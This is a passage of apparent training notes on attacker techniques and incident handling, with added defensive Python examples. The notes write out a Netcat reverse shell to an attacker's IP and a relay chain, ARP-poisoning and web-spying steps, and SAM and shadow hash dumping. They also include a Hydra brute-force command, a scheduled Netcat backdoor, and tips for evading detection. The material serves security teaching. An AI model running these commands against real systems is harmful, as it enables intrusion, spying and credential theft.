             When listening normally using nc -l, it waits for a connection. Once the connection is established and the client terminates it, listen mode is also dropped. Whereas in persistent listen mode, even if the client terminates the connection, it is still listening.
nc -u        UDP mode; if no -u is given, it is TCP
nc -p 80     In listen mode, it listens on that local port (80). In client mode, it sends data from source port 80 (local)
nc -e        Execute a program after the connection has occurred
nc -z        Zero I/O: no data transfer, only the TCP connection is established; may send UDP packets
nc -w <sec>  Wait for connection. E.g.: nc -w 3 waits 3 seconds for a connection before it is torn down. Even if a connection is made and there is no data for 3 seconds, it will go off.
nc -vv       Very verbose

It can be used for:
o transferring files on TCP/UDP ports
o port scanning
o banner grabbing
o a small vulnerability scanner – what vulnerable services are running on the target
o backdoor
o relay

Suppose we want to do port scanning. It is a good idea to use port 80 or 443 as the source port so as to evade detection. Also it is better to scan ports in a random order using the -r switch.

C:\>nc -v -r 192.168.12.1 1-100


Now the connection is established... Whatever you type at the client will be visible at the server and vice versa.

Transferring I/O (even files)
We need to use <, > and | to redirect I/O between connections.

C:\Mahesh\Tools\NetCat>nc -vv localhost 17876 < readme.txt

Now readme.txt is transferred to the other machine listening on port 17876.

Backdoor

Not only input: it can also bind an executable to a specified port.

On Server,
C:\Mahesh\Tools\NetCat>nc -lvvp 17876 -e calc.exe
listening on [any] 17876 ...
DNS fwd/rev mismatch: localhost != RedPC

On Client,
C:\Mahesh\Tools\NetCat>nc -vv localhost 17876
DNS fwd/rev mismatch: RedPC != localhost
RedPC [127.0.0.1] 17876 (?) open

Now at client, Calculator has popped up.


Backdoor 2 (Reverse Shell)

Creating a listening shell with Netcat is a valuable technique, but in order for this technique to be effective the attacker needs to be able to send data to the port on which Netcat is listening. This can pose a problem if there is a router or firewall in the path blocking inbound traffic, as you will not be able to reach the listening port. The solution is to reverse the direction: the victim connects out to the attacker's listener, and we can then send commands to the victim's shell to execute.

Attacker: the server is listening for a connection
C:\>nc -lvvp 4444
listening on [any] 4444 ...

Victim: the client sends its shell to the server

BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash
192.168.0.198: inverse host lookup failed: Unknown
(UNKNOWN) [192.168.0.198] 4444 (krb524) open

Alice: after the connection – ready to take commands


It is suggested to use Netcat instead of Telnet when you find an open port on a machine, because Netcat is fast and Telnet uses telnet control sequences which might blow up some applications running on the end machine.

Replay Attack

From the pcap file, we can strip off the headers, save only the content to a file and send it to the target machine using Netcat. E.g.: if we have captured a transaction command "TRANSFER 1000$ from Acc A to Acc B", replay it.

Relay – when you attack a victim, be untraceable.

Hackers use relays located in at least 5 places which are geographically distant and have bad political relationships with each other. E.g.: to attack the USA, start with relays in China, India, Pakistan, Israel and Ukraine.

1. The attacker first compromises Relay 1 and Relay 2.
2. Configure each relay with a Netcat listener on one port piped into a Netcat client that forwards to the next relay on another port.


Attacker:
C:\>nc <Relay1> 4321

Relay1:
C:\> nc -L -p 4321 | nc <Relay2> 4321

Relay2:
C:\> nc -L -p 4321 | nc <Target> 4321

NOW, we have established a one-way channel from attacker to target.

Target:
C:\>nc -L -p 4321

<<Not Clear Look into it>>

1:17

Defending Against Netcat

o Prevent Netcat file transfers
  o Firewall configuration issue
o Secure against port scanning
  o Minimal number of listening ports
  o Block arbitrary connections to ports
  o Close unused ports [an open port should have a justification]
o Protect against vulnerability scanning
  o Apply patches
o Backdoors
  o Need to know what processes are running so you can detect rogue processes
o Prevent relay attacks
  o No single point that an attacker can relay around
o Stop persistent listeners
  o Periodically check for unexpected listening ports
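The last two defences (know your processes, periodically check for unexpected listeners) as a small audit, added here as an example that is not part of the original notes. It assumes the host keeps a baseline of justified port/process pairs and reads `ss -Hltnp` output; the sample output below is constructed.

```python
import re
from typing import Dict, List, Tuple

# Baseline of justified listeners: port -> owning process ("an open port should have a justification").
BASELINE: Dict[int, str] = {22: "sshd", 80: "nginx", 443: "nginx"}

# Constructed sample lines in the shape of `ss -Hltnp` output (no header, TCP listeners with processes).
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=1033,fd=6),("nginx",pid=1034,fd=6))
LISTEN 0 10 0.0.0.0:4444 0.0.0.0:* users:(("nc",pid=2410,fd=3))
LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=812,fd=4))
LISTEN 0 128 127.0.0.1:443 0.0.0.0:* users:(("python3",pid=2999,fd=5))
"""

# First ("name",pid=N ...) pair in the users:(...) column.
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def parse_listeners(text: str) -> List[Tuple[int, str, int, str]]:
    """Return (port, process, pid, local_address) for each LISTEN line."""
    out = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        local = fields[3]                         # e.g. 0.0.0.0:22 or [::]:22
        port = int(local.rsplit(":", 1)[1])       # rsplit copes with IPv6 brackets
        m = PROC_RE.search(line)
        proc, pid = (m.group(1), int(m.group(2))) if m else ("?", 0)
        out.append((port, proc, pid, local))
    return out


def audit_listeners(text: str, baseline: Dict[int, str] = BASELINE) -> List[str]:
    """Flag ports with no justification and justified ports owned by the wrong process."""
    findings = []
    for port, proc, pid, local in parse_listeners(text):
        if port not in baseline:
            findings.append(f"UNEXPECTED port {port} ({local}) owned by {proc} pid {pid}")
        elif proc != baseline[port]:
            findings.append(f"MISMATCH port {port}: expected {baseline[port]}, found {proc} pid {pid}")
    return findings


if __name__ == "__main__":
    for finding in audit_listeners(SAMPLE_SS_OUTPUT):
        print(finding)
```

Run it from cron and diff against the previous run; a persistent listener such as the nc -L backdoor above shows up as an UNEXPECTED port, and a baseline port taken over by another binary shows up as a MISMATCH.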

Exercise
Create a backdoor, create a relay.
Scenario: you are sitting outside a firewall that blocks inbound access but allows outbound packets. How do you get outside access to a listener inside?


SNIFFING

Wireshark – it can parse many protocols.
Sniffit – it can be used in interactive mode (sniffit -i), i.e., it is able to handle interactive sniffing of sessions in real time. The attacker can directly see what the victim is doing, in real time, by sniffing the session.

These tools only work for passive sniffing (parsing packets arriving at the NIC) and hence work in a hub environment.

Active sniffing – injects packets into the network so as to sniff in a switched environment.

DSniff – A collection of tools for network auditing and penetration testing.

Foiling Switches Using ARP Spoofing [arpspoof] – Over Ethernet, data is transferred using frames containing source and destination MAC addresses. The destination MAC address is found by sending an ARP request.

Upon receiving an ARP reply packet (irrespective of whether an ARP request was sent or not), a machine updates its ARP cache (the mapping of IP to MAC address).


1. So if the victim host receives an ARP reply packet containing a valid destination IP (a router/server etc.) and the attacker's MAC address... voila... the victim's machine has been poisoned.

2. Configure your machine with IP forwarding (if the packet is not destined for your MAC, forward it to the default gateway).
IP forwarding on Linux: echo 1 > /proc/sys/net/ipv4/ip_forward
[The TTL is decremented by the forwarding hop. As an investigator, if we can identify that the TTL has been decremented one more time than the path would explain, we need to look into it.]

In practice, gratuitous ARP can be used for good, such as in failover cases: ARP the router's address over to the failover machine.

Foiling Switches by Flooding the Switch [macof] –

1. Send Ethernet frames with spoofed MAC addresses to the switch so that the MAC address table on the switch is filled and no more entries can be loaded.

2. Now some switches go to either a denial-of-service state, delivering no packets, or a hub state, delivering packets across all interfaces of the switch.

Additional Tools with DSniff,

tcpkill – kills active TCP connections.

When there is a telnet connection, you can break it by sending RST packets to both ends. Then sniff during the re-authentication to gather credentials.

tcpnice – injects ICMP source quench messages to slow down the traffic.

filesnarf – captures the transferred files.

mailsnarf – grabs e-mails sent using SMTP and POP.

msgsnarf – grabs messages sent using AOL Instant Messenger, ICQ, Internet Relay Chat, and Yahoo! Messenger.

urlsnarf – grabs the URLs visited.

webspy – using the URLs captured from the network, displays the pages viewed by the victim on the attacker's browser. Essentially, webspy lets the attacker look over the victim's shoulder as the victim surfs the Web. Webspy is quite useful for demos to management. HTTPS doesn't work.

Things that authenticate using cookies etc. may or may not work.


Exercise - WebSpying on a Victim

1. Enable IP forwarding [or use fragrouter with no fragmentation]
# echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP Poisoning on Victim and Gateway

#arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 [Poison the target with the gateway IP]

#arpspoof -i eth0 -t 192.168.1.1 192.168.1.5 [Poison the gateway with the target IP]

Now you are the man in the middle.

3. Use webspy to grab the browser traffic [IE and Netscape]

#webspy -i eth0 192.168.1.5 [Spy on the target IP's traffic]

4. Start the browser from the command line

#firefox &

5. Now you can see what the victim is browsing.

Just a tip: if possible, have the proxy log User-Agent types in web traffic. From unusual User-Agents we can identify malware-infected machines and their traffic.

DNSSpoof


webmitm (Web Monkey in the Middle) – it acts as a proxy.

After DNS spoofing, the victim comes to you for the service he is trying to reach. E.g.: he wants to go to the banking site www.abcbank.com; dnsspoof running on the attacker's machine sends a spoofed DNS response to the victim claiming that the attacker's address is abcbank.com. Now the user comes to you.

Now you have to either phish the site or proxy the site.

The problem with the above is certificate errors. The victim is presented with the attacker's certificate, not abcbank.com's certificate, which warns the user that somebody is pretending to be their bank.


The top warning box can be avoided by having a certificate signed by a CA.

The second warning box is caused by the fact that the browser notices that the DNS name in the certificate does not match the name of the web site that the user is trying to access. A careful attacker can make sure the name on the certificate matches the domain name of the web server, but a legitimate, trustworthy Certificate Authority should never sign such a bogus certificate for someone impersonating a bank.

Unfortunately, most users just click yes... yes... yes to establish an SSL connection with the untrusted site.

The same works for SSH also (the host key changes, and the user accepts the new key).

Defences

Make sure system administrators, network managers and security personnel understand and use secure protocols to conduct their job activities.

For networks containing very sensitive systems and data, enable port-level security on your switches, i.e., bind the MAC address to a port using Port Security.

For extremely sensitive networks like Internet DMZs, use static ARP tables on the end machines, hard-coding the MAC address to IP address mapping for all systems on the LAN. This takes extra overhead whenever NIC components are changed.
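The ARP poisoning described above leaves a trace in the victims' ARP caches: the gateway's MAC suddenly changes and one MAC is claimed by two IPs. This added example (not from the original notes) checks two constructed snapshots in the shape of `ip -4 neigh show` output against each other and against a static ARP table of critical hosts; the addresses are hypothetical.

```python
import re
from collections import defaultdict
from typing import Dict, List

# One `ip -4 neigh show` line: "<ip> dev <iface> lladdr <mac> <state>"
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17})", re.I)

# Constructed snapshot before the attack: gateway .1, a workstation .5, and host .77.
BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.5 dev eth0 lladdr 00:11:22:33:44:05 STALE
192.168.1.77 dev eth0 lladdr de:ad:be:ef:00:77 REACHABLE
"""

# Constructed snapshot after a poisoned ARP reply: the gateway now "is" .77's MAC.
AFTER = """\
192.168.1.1 dev eth0 lladdr de:ad:be:ef:00:77 REACHABLE
192.168.1.5 dev eth0 lladdr 00:11:22:33:44:05 REACHABLE
192.168.1.77 dev eth0 lladdr de:ad:be:ef:00:77 REACHABLE
"""

# The hard-coded mapping a static ARP table would enforce for critical hosts (the gateway here).
STATIC_ARP: Dict[str, str] = {"192.168.1.1": "00:11:22:33:44:01"}


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> lowercase MAC for every resolved neighbour entry."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def detect_arp_anomalies(before_text: str, after_text: str,
                         static: Dict[str, str] = STATIC_ARP) -> List[str]:
    """Flag static-table violations, changed mappings, and one MAC claimed by several IPs."""
    before, after = parse_neigh(before_text), parse_neigh(after_text)
    findings = []
    for ip, mac in after.items():
        if ip in static and static[ip] != mac:
            findings.append(f"STATIC_VIOLATION {ip} is {mac}, expected {static[ip]}")
        elif ip in before and before[ip] != mac:
            findings.append(f"CHANGED {ip} {before[ip]} -> {mac}")
    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"DUPLICATE_MAC {mac} claimed by {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    for finding in detect_arp_anomalies(BEFORE, AFTER):
        print(finding)
```

A legitimate NIC swap or failover also trips CHANGED, which is exactly the extra overhead the notes mention for static tables: the finding needs a human to confirm against the change record.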


Identification

On the suspect Unix machine, run ifconfig; if the word PROMISC is there, it is listening. On Windows, use PromiscDetect, another free tool, at http://ntsecurity.nu/toolbox/promiscdetect

To detect from remote, use Sentinel, which uses the EtherARP, EtherPing and DNS tests to identify sniffers:
o EtherARP – send an ARP request to the suspect IP with a bogus destination MAC; if a response is received, it is listening.
o EtherPing – same as EtherARP, but it uses an ICMP ping. If it doesn't sniff, it should not see the ping.
o DNS test – send traffic to a bogus address and check whether any other machine does a reverse DNS lookup of that address.

Containment
If detected on one machine, it can be present on another machine.

Eradication
Check for rootkits and identify the process that is listening in promiscuous mode.

Recovery
Monitor the attacker's activity, as he is likely to use the information gathered by sniffing.


Day 3 Session 2

Session Hijacking

Tools:
o Hunt
o Dsniff --- sshmitm
o Ettercap
o Juggernaut
o IP Watcher, TTYWatcher, TTYSnoop

Network-based session hijacking
o Combines spoofing and sniffing
o Alice and Bob have an existing connection
o Trudy is sniffing packets (on the LAN)
o Trudy starts injecting packets
o Bob thinks the packets came from Alice

This works even if strong authentication is used, provided there is no encryption.

ACK Storm


The ACK storm can be avoided using Ettercap, with Eve becoming the man in the middle by ARP poisoning. Now Eve sniffs the packets destined for DD.DD… and replays them to Bob.

Whenever packets actually travel between Alice and Bob, Ettercap will "fix" the sequence number on those packets before forwarding them on. Alice and Bob don't notice any discontinuity in the sequence number stream, so no ACK storm results.

If Eve is far from Alice and Bob, Eve has to ARP poison the routers/switches between Eve and Alice and between Eve and Bob.

Defense

Encrypted sessions prevent session hijacking because the attackers will not have the keys to encrypt or decrypt information. Therefore, an attacker cannot inject meaningful traffic into a session.

Use all defenses that apply for Sniffing and Spoofing

Identification

Users might report that they lose sessions.
Error messages from SSH that server keys have changed.

Eradication


Check for rootkits and change the passwords.

DNS Cache Poisoning

>> Search <<

Buffer Overflows SANS_3B – 50:00

Stack Based Buffer Overflow

This can be exploited when input sanitization and bounds checking are not performed by the application.

When a function call is made, execution of the caller stops and its return address is stored on the stack so that execution can resume there after the called function completes [Return PTR].

The current state of the registers is stored as the Saved Frame PTR.

Inside the function, memory for its variables is allocated on the stack (the stack buffer). Suppose the input is larger than what the variable can hold: the input data overflows and overwrites the Return PTR.

Now when the function completes and the original program resumes, it loads the value in the Return PTR, which has been overwritten by the malicious input.

Usually the Return PTR is overwritten with an address on the stack which holds the malicious shellcode.


Culprit: missing input bounds checking

1. Identify the buffer size; strictly speaking, identify the location of EIP. Supply a very long input pattern; when the application crashes, look into the technical information: if the segmentation fault was caused by trying to access a location whose address is part of the input sequence we supplied, that tells us where in the input EIP lies. [Brute-force fuzzing]

2. The exploit is tailored to the operating system and architecture.

3. If the exploit is too large to fit into the buffer, then split the exploit.

E.g., part of the exploit goes in one field and the remainder in another field. After the overflow of one field, the shellcode there does a JMP to the code in the other field.

4. One more method is staged loading: a small first-stage exploit runs; when it reaches the end of its code it fetches the next stage, loads it into the same space and runs again.

5. If you are not sure of the exact location of the exploit code, use NOP NOP NOP NOP <EXPLOIT>. Now even if the return pointer lands on a NOP, execution slides through the NOPs and finally runs the exploit.

Sploit


MetaSploit

Exploit: it is what triggers the vulnerable condition so that we can execute code.

Payload: the actual code that executes; it can be the machine code of a shell, a command to add another user, etc.

It has an arsenal of exploits.

Metasploit offers a huge set of payloads, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself. An attacker using Metasploit can choose from any of the following payloads to foist on a target:

Bind shell to current port. This payload opens a command shell listener on the target machine using the existing TCP connection of a service on the machine. The attacker can then feed commands to the victim system across the network to execute at a command prompt.

Bind shell to arbitrary port. This payload opens a command shell listener on any TCP port of the attacker's choosing on the target system.

Reverse shell. This payload shovels a shell back to the attacker on a TCP port. With this capability, the attacker can force the victim machine to initiate an outbound connection, sent to the attacker, polling the bad guy for commands to be executed on the victim machine. So, if a network or host-based firewall blocks inbound connections to the victim machine, the attacker can still force an outbound connection from the victim to the attacker, getting commands from the attacker for the shell to execute. As we discuss in Chapter 8, Phase 3: Gaining Access Using Network Attacks, the attacker will likely have a Netcat listener waiting to receive the shoveled shell.

Windows VNC Server DLL Inject. This payload allows the attacker to control the GUI of the victim machine remotely, using the Virtual Network Computing (VNC) tool sent as a payload. VNC runs inside the victim process, so it doesn't need to be installed on the victim machine in advance. Instead, it is inserted as a DLL inside the vulnerable program to give the attacker remote control of the machine's screen and keyboard.

Reverse VNC DLL Inject. This payload inserts VNC as a DLL inside the running process, and then tells the VNC server to make a connection back to the attacker's machine, in effect shoveling the GUI to the attacker. That way, the victim machine initiates an outbound connection to the attacker, but allows the attacker to control the victim machine.

Inject DLL into running application. This payload injects an arbitrary DLL of the attacker's choosing into the vulnerable process, and creates a thread to run inside that DLL. Thus, the attacker can make any blob of code packaged as a DLL run on the victim.

Create Local Admin User. This payload creates a new user in the administrators group with a name and password specified by the attacker.

The Meterpreter. This general-purpose payload carries a very special DLL to the target box. This DLL implements a simple shell, called the Metasploit Interpreter.

o It does not create a new process, it just runs inside the vulnerable app -> no detection.

o It doesn't touch the hard drive -> no evidence.

o Although the vulnerable application has limited access rights, Meterpreter's commands have full privileges -> great control for the attacker.

PRIV is an injected extension that carries a bunch of privilege escalation attacks, so that even when a user with limited privileges is exploited, the attacker can run commands with admin privileges.

Meterpreter 3

Polymorphic Code – used to avoid signature detection by AV

o XOR – the exploit code is XORed with a key


o Randomized NOP Generator – uses functional equivalents of code that does nothing, e.g. multiplying AH by 1, adding 0 to CX, etc., at various places in the exploit code to evade detection.

Exercise:
1. Most machines have a TFTP client on them. So exploit the target machine and get a small shell on it.

2. On that shell, get Netcat using TFTP.

3. Use Firewalk to identify which packets are allowed and use the corresponding mechanism to transfer files. [Some firewalls block the outgoing TFTP port; then use FTP, and if that is blocked use SSH.]

4. Use a bind shell or reverse shell to take control.

Defending

Apply Patches

Use HIPS

o They observe syscalls

o Look into memory – look for strange jumps

Non Executable Stacks

o On Windows, use DEP (Data Execution Prevention)

o On Solaris, enabled by default

o On Linux, there are patches by "Solar Designer"

Attacker: OK, no problem, I will use functions which are already in libc / ntdll.dll to carry out the malicious activity... I am just using those functional components which are necessary and allowed within the application. – Return to libc, Return to NTDLL

Use StackShield: Stack Shield is a tool for adding protection against this kind of attack to programs at compile time without changing a line of code. Stack Shield uses a more secure protection system than other tools like Immunix StackGuard. Stack Shield is designed to support GCC on a Linux Intel 386-class platform.


Avoid Programming Errors

Use Static Code Analysis Tools

Parser Vulnerabilities

An IDS/IPS parses the data packets in order to analyze them and let them through. Some maliciously crafted packets, when parsed by the IDS/IPS, cause a buffer overflow and thus blind the IDS; i.e., to management it shows no suspicious packets (but it is actually not detecting them).

File parsers also cause buffer overflows when a maliciously crafted file is opened. E.g., when you open a JPEG file, it executes malicious code.

Format String Attacks

C:\Mahesh\Tools\NetCat>sort %x%x%x
7c812fd900
The system cannot find the file specified.

7c812fd900 is the value on the stack.

%x reads and prints 4 bytes from the stack

o this may leak sensitive data

%n writes the number of characters printed so far to an address taken from the stack

o this allows memory-corruption attacks...

C format strings break the "don't mix data & code" principle.

Easy to spot & fix:

o replace printf(str) by printf(“%s”, str)

>>>Checkout formatflaw.c<<<


>>>Some Exercises in last 20 mins<<<

Day 4

Missing user input sanitization is the major culprit behind attacks such as buffer overflows, format string attacks, SQL injection, etc. If the application is prone to such attacks, the attacker can inject a command shell to carry out further attacks.

Eg: Exploiting Unicode Vulnerability in Windows IIS

Password Cracking

Password crack resources: http://www.skullsecurity.org/wiki/index.php/Passwords

Default Passwords: http://www.phenoelit-us.org/dpl/dpl.html

Password Guessing:

Hydra: http://freeworld.thc.org/thc-hydra/
It supports many protocols: Telnet, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MySQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, and Cisco AAA

#hydra -l <user> -P <passworddictionary> -v <target> <protocol>

In the above, it is brute-forcing 192.168.0.112 for the user ftp with the list of passwords stored in passwords.txt.

o It is time-consuming and resource intensive
o It generates IDS alerts
o Usually machines are configured with account lockouts after multiple login failures
o It can also be used as a DoS attack

Password Cracking:


Passwords are stored in either encrypted form or as a hash (message digest) on the machine that authenticates the user before logging in.

Hybrid Password Cracking – the password-cracking tool starts guessing passwords using a dictionary term. Then it creates other guesses by appending or prepending characters to the dictionary term, methodically adding characters to words in a brute-force fashion.

Password cracking for a botnet owner would be fairly easy and simple.

Cain, a fantastic free tool available from Massimiliano Montoro at www.oxid.it/cain.html

John the Ripper, a powerful free password cracker for UNIX/Linux and some Windows passwords, written by Solar Designer, available at www.openwall.com/john

Pandora, a tool for testing Novell Netware, including password cracking, written by Simple Nomad, and available at www.nmrc.org/project/pandora

LC5, the latest incarnation of the venerable L0phtCrack password cracker, an easy-to-use but rather expensive commercial password cracker at www.atstake.com/products/lc/purchase.html

CAIN:

It's not just a password cracker; it is a multitude of tools:

o WLAN discovery like NetStumbler
o Identify if the target is sniffing packets
o Network discovery
o Captures interesting packets on the network containing user IDs etc.
o A tool to dump and reveal all encrypted or hashed passwords cached on the local machine, including the standard Windows LM and NT password representations, as well as the application-specific passwords for Microsoft Outlook, Outlook Express, Outlook Express Identities, Outlook 2002, Microsoft Internet Explorer, and MSN Explorer.
o An ARP cache poisoning tool, which can be used to redirect traffic on a LAN so that an attacker can more easily sniff in a switched environment.
o A remote command shell, rather like the backdoor command shells.
o A remote route table manager, so an administrator can tweak the packet routing rules on a Windows machine.
o A remote TCP/UDP port viewer that lists local ports listening on the system running Abel, rather like the Active Ports and TCPView tools.
o A remote Windows password hash dumper, which an attacker can use to retrieve the encrypted and hashed Windows password representations from the Security Accounts Manager (SAM).

Password Cracking On Windows

1. Retrieve the LM hash and NTLM hash from the SAM database.

2. Use Cain to crack it.

Retrieving Hashes

C:\Windows\repair\sam._ [original SAM file cannot be opened/copied]

Cain can also retrieve LM / NTLM hashes from challenge/response packets on the network.

Whenever anyone authenticates to the domain or tries to access a share, the attacker can run Cain in sniffing mode to snag the user's authentication information from the network.

So the attacker can entice the victim into making such an authentication, e.g., by sending a mail that opens a shared drive which needs authentication.

It also supports Rainbow Tables.

Rainbow Tables – a rainbow table is a lookup table of pre-computed hashes that can be matched against the hash that needs to be cracked. It helps recover plaintext passwords.

Salts make cracking with rainbow tables difficult: the table would have to be recomputed for every possible salt value. Usually salts are 64 bits on most systems. Unfortunately, no salt is used for Windows NTLM hashes.
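Why an unsalted hash is a one-probe lookup while a salted one forces per-salt work, as an added example that is not part of the original notes. SHA-256 over UTF-16LE stands in for NTLM's MD4 (an assumption, since hashlib on modern OpenSSL may lack MD4); the candidate list and salt are constructed.

```python
import hashlib
from typing import Dict, Iterable, Optional

# Constructed candidate list: in a real rainbow table this is millions of entries, built once.
CANDIDATES = ["password", "Password1", "letmein", "summer2010", "qwerty"]


def unsalted_hash(pw: str) -> str:
    """Stand-in for an unsalted NTLM-style hash: H(password) with nothing else mixed in."""
    return hashlib.sha256(pw.encode("utf-16le")).hexdigest()


def salted_hash(pw: str, salt: bytes) -> str:
    """Same hash with a per-account salt prepended: H(salt || password)."""
    return hashlib.sha256(salt + pw.encode("utf-16le")).hexdigest()


def build_table(candidates: Iterable[str] = CANDIDATES) -> Dict[str, str]:
    """The precomputed table: hash -> plaintext, reusable against every unsalted store."""
    return {unsalted_hash(pw): pw for pw in candidates}


def lookup(table: Dict[str, str], stored_hash: str) -> Optional[str]:
    """Unsalted store: one dictionary probe per stolen hash, no hashing at crack time."""
    return table.get(stored_hash)


def lookup_salted(candidates: Iterable[str], stored_hash: str, salt: bytes) -> Optional[str]:
    """Salted store: the precomputed table is useless; every candidate is re-hashed per salt."""
    for pw in candidates:
        if salted_hash(pw, salt) == stored_hash:
            return pw
    return None


def table_entries_needed(candidate_count: int, salt_bits: int) -> int:
    """Entries a precomputed table would need to cover every salt value for every candidate."""
    return candidate_count * (2 ** salt_bits)


if __name__ == "__main__":
    table = build_table()
    stolen_unsalted = unsalted_hash("letmein")            # as if read from an unsalted SAM
    print("unsalted:", lookup(table, stolen_unsalted))     # recovered by one probe
    salt = b"\x01\x02\x03\x04\x05\x06\x07\x08"             # constructed 64-bit salt
    stolen_salted = salted_hash("letmein", salt)
    print("salted via table:", lookup(table, stolen_salted))           # None
    print("salted via per-salt work:", lookup_salted(CANDIDATES, stolen_salted, salt))
    print("entries to precompute for 64-bit salts:", table_entries_needed(len(CANDIDATES), 64))
```

The per-salt search still succeeds for a weak password, which is why the salt complements rather than replaces the password policy in the Defenses section below.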


Samdump2

To retrieve these hashes from a Windows machine, boot from Linux, mount the C:\ drive and dump the SAM database.

[root@~]#samdump2 /mnt/CPrimary/Windows/system32/config/SYSTEM /mnt/CPrimary/Windows/system32/config/SAM > samdb.txt

NOTE: SYSTEM should be dumped prior to dumping SAM, since if syskey is enabled the SAM DB is encrypted and the key is stored in the SYSTEM hive.

John The Ripper

A superb professional password cracking tool.

On Linux, Retrieving Hashes

/etc/passwd

In some Linux distributions, the hashes are stored in /etc/shadow (or /etc/secure).


#./unshadow <passwd file> <shadow file> > output.txt

To grab a copy of a shadow password file, an attacker must find a root-level exploit, such as a buffer overflow in a program that runs as root or a related technique, to gain root access. After achieving root-level access, the attacker makes a copy of the shadow password file to crack.

Defenses:

Strong Password Policy

o Use alphanumeric characters, mixed case and numbers

o Password expiry after 30, 60 or 90 days

o Use password filtering software on the AD server during account creation and password modification


Password Guardian, a commercial tool www.georgiasoftworks.com

Strongpass, a free tool http://ntsecurity.nu/toolbox
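Added example, not part of the notes or of either tool above: a minimal password filter in Python that applies the policy rules listed above (mixed case, digits) plus the checks a real AD password filter adds, namely a minimum length, a username check and a dictionary check against a constructed stand-in for John's password.lst. The wordlist, the usernames and the 8-character minimum are assumptions.

```python
import re

# Constructed stand-in for a cracker's dictionary such as John the Ripper's password.lst.
COMMON_PASSWORDS = {"password", "letmein", "qwerty", "welcome", "admin", "summer"}


def password_policy_violations(password, username, wordlist=COMMON_PASSWORDS, min_length=8):
    """Return the list of policy rules the candidate password violates (empty = accepted).

    Rules follow the notes above (alphanumeric, mixed case, digits) plus a minimum length,
    a username check and a dictionary check, which password filters commonly enforce.
    """
    violations = []
    if len(password) < min_length:
        violations.append(f"shorter than {min_length} characters")
    if not re.search(r"[a-z]", password):
        violations.append("no lowercase letter")
    if not re.search(r"[A-Z]", password):
        violations.append("no uppercase letter")
    if not re.search(r"[0-9]", password):
        violations.append("no digit")
    if username and username.lower() in password.lower():
        violations.append("contains the username")
    # Strip the usual digit/symbol suffix (password1, Summer2009!) before the dictionary
    # check, since crackers' rule sets try exactly those mangling patterns.
    core = re.sub(r"[\d\W_]+$", "", password).lower()
    if password.lower() in wordlist or core in wordlist:
        violations.append("dictionary word (possibly with a suffix)")
    return violations


if __name__ == "__main__":
    for candidate, user in [("Summer2009", "jdoe"), ("password", "bob"), ("Tr4ffic-Cone9", "jdoe")]:
        print(candidate, "->", password_policy_violations(candidate, user) or "accepted")
```

"Summer2009" passes every character-class rule yet is rejected, because the suffix-stripped core is a dictionary word; that is the case a naive complexity check misses and a cracker's mangling rules catch first.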

User Awareness

Where Possible, Use Authentication Tools Other Than Passwords

o Use RSA Tokens, Biometric access

Protect Hashes

o On Linux, activate password shadowing, i.e. use /etc/shadow, which can be read only by root

o On Windows, disable LM authentication: define HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

o Delete %systemroot%\repair\sam._

Exercise

1) Create various accounts.

2) Combine a copy of the passwd file and a copy of the shadow file and retrieve the hashes.

3) Look at John the Ripper's password.lst.

4) Delete the accounts.

5) Shred the files, which overwrites them with patterns of 0s and 1s so that they cannot be recovered from the hard disk blocks.

----------------- break ----------------------

Shell Access On Windows

Scenario: The attacker has an account created on the victim and uses a remote connection to open C$ of the victim's machine. Now the attacker copies netcat onto the victim's machine. Now the attacker runs:

Z:\>nc -l -p 1545 -e cmd.exe [Z: on the attacker's machine is C:\ on the victim's machine]

Result: the attacker created a netcat listener on himself :P LOL.....


1. Connect to the remote machine with an administrative session.

2. Copy netcat and a batch file that runs netcat as a listener to the target machine.

3. Configure Task Scheduler to run the Batch file

at \\computername time /interactive | /every:date,... /next:date,... command

at \\computername id /delete | /delete/yes

This will run netcat.bat every day at 4:02 PM on the victim machine with SYSTEM privileges.

Now Netcat is listening on the victim machine.

Alternately,

3. psexec from sysinternals is used to run executable on remote machines

Z:\>psexec \\victimmachine -c netcat.bat [copy the file]


Z:\>psexec \\victimmachine netcat.bat [Run the batch file]

Run Regedit interactively in the SYSTEM account to view the contents of the SAM and SECURITY keys:

psexec -i -d -s c:\windows\regedit.exe

PSEXEC did not work out due to BlackIce, which blocked it on the victim machine.

Defences

o Do not let the attacker get admin access to the machine.

o Harden the ports.

o net session shows what sessions are present on the machine; net start shows what services are running.

o Disable the scheduler service if it is not required.

Containment

o Check the scheduled tasks and delete them.

o Kill the services/processes that are listening.

Eradication

o Identify the process and remove it.

o Check for rootkits; if present, rebuild the machine.

Recovery

o Harden the machine based on the preparation phase.
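Added example, not from the notes: the containment check above ("kill the services/processes that are listening") done in Python over netstat -ano and tasklist output, joining the two on PID and comparing against a baseline of expected listeners from the preparation phase. The sample command output and the baseline are constructed for the example.

```python
import csv
import io

# Constructed "netstat -ano" output (not captured from a real host).
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
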